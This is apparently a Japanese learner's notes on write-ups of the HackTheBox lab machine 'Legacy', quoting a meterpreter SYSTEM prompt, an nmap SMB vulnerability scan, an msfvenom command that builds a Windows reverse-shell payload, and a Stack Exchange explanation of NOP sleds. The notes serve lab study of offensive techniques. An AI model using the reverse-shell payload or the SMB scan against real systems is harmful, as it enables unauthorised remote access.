今回は、マシンLegacyに関して。
またWriteUpを見ていきます

• • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • -

■【HackTheBox】Legacy - Walkthrough - - Qiita
Windowsのユーザ確認

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

■Legacy | Hackthebox OSCP series | Spenge's Cybersecurity Blog
OSCPライクに、MSFを使用しない攻略

SMBのポートを発見した後、nmapを用いた脆弱性スキャンをする

nmap --script smb-vuln* -p 139,445 10.10.10.14

meterperterを用いないペイロードの作成(msfvenom)

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode

NOPS?
あとで確認

But we may not forget the comment in the exploit telling us the decoder needs enough NOPS at the beginning for the decoder to work!

→NOPSについての説明を見つけた
参考：
shellcode - NOPS in Metasploit - Information Security Stack Exchange

In assembly code, NOP is short for No OPeration. This is most popularly known for x86 chips as 0x90. When a processor loads that instruction, it simply does nothing (at least useful) for the one cycle and then advances the register to the next instruction.

NOPs keep the payload sizes consistent

... by ensuring that any space not used by other code will still be validly executable by the processor with no side effects. This "NOP sled" is also the source of humorous names like DEFCON 19 CTF winners European Nopsled Team.

The practical importance of this has to do with writing instruction jumps. Jumps can either be of a relative jump (read the memory 8 bytes before where you are now) or of an absolute jump (read the memory located at position 0x874710). If you move data around at all with an absolute jump, you must recode any references to it. If you move one instruction around relative to another, you must also recode the relative jumps. Putting NOPs in simplifies the problem because a jump that lands anywhere in a series of NOPs will continue on to the first executable instruction and prevent the processor from reading an invalid code that would stop execution and crash the software.

Most prevalently, if you know the pointer for the stack will point somewhere in a continuos range of memory addresses, you'd fill that with NOPs and then put your code after.

Check out this shellcode writing tutorial that explains when it makes use of NOPs to gain better understanding.

→つまり、何もしない命令を含めてペイロードの長さを調節するものってことでいいかな？？？？

今回も色々収穫ありました！

以上。